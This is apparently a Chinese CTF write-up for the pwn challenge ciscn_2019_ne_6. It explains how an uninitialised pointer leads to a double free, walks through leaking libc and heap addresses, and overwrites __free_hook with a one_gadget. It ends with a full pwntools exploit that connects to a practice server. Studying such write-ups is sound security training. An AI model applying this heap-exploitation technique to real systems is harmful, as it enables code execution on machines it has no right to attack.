指针未初始化导致double free

ciscn_2019_ne_6

checksec:

1

漏洞点:

2

3

未初始化的指针ptr,通过构造s来达到任意地址释放,形成double free

这里free没有清空内容,我们释放一个chunk进unsortedbin,在申请回来就得到了libc地址

1
2
3
4
5
6
7
8
9
10
11
12
add(0x420,b'a\n') #0
add(0x80,b'a'*0x80) #1
add(0x80,b'b'*0x80) #2


 
free(0)
add(0x420,b'\n') #0
show()

libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success('libc_base  ----------------->'+hex(libc_base))

再泄露一个chunk地址

1
2
3
4
5
6
7
8
9
10
free(2)
free(1)

add(0x80,b'\n')
show()
io.recvuntil(b'1: ')

heap_base = u64(io.recv(6).ljust(8,b'\x00'))
success('heap_base  ----------------->'+hex(heap_base))

控制ptr造成doublefree,改freehook就完事

1
2
3
4
5
6
7
8
free(-1,b'\x00'*(0x20)+p64(heap_base))

add(0x80,p64(free_hook)+b'\n')
add(0x80,p64(free_hook)+b'\n')
add(0x80,p64(one[1]+libc_base)+b'\n')

free(0)

全部exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#codingutf8  
from pwn import*
context(os='linux',arch='amd64',log_level='debug')

#io = process('./ciscn_2019_ne_6')
io = remote('node4.buuoj.cn',29229)
elf = ELF('./ciscn_2019_ne_6')

libc = ELF('./libc-2.27.so')
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]

def show():
   io.sendlineafter(b'>>',b'1')
 
def add(size,content):
   io.sendlineafter(b'>>',b'2')
   io.sendlineafter(b'passwd:',b'a')
   io.sendlineafter(b'size:',str(size).encode())
   io.sendafter(b'Content:',content)
 
def edit(index,content):
   io.sendlineafter(b'>>',b'3')
   io.sendlineafter(b'passwd:',b'a')
   io.sendafter(b'Content:',content)
 
def free(index,passwd = b'a'):
   io.sendlineafter(b'>>',b'4')
   io.sendafter(b'passwd:',passwd.ljust(0x28,b'\x00'))
   io.sendlineafter(b'index:',str(index).encode())

add(0x420,b'a\n') #0
add(0x80,b'a'*0x80) #1
add(0x80,b'b'*0x80) #2


 
free(0)
add(0x420,b'\n') #0
show()

libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success('libc_base  ----------------->'+hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']

free(2)
free(1)

add(0x80,b'\n')
show()
io.recvuntil(b'1: ')

heap_base = u64(io.recv(6).ljust(8,b'\x00'))
success('heap_base  ----------------->'+hex(heap_base))

free(-1,b'\x00'*(0x20)+p64(heap_base))

add(0x80,p64(free_hook)+b'\n')
add(0x80,p64(free_hook)+b'\n')
add(0x80,p64(one[1]+libc_base)+b'\n')

free(0)

io.interactive()

4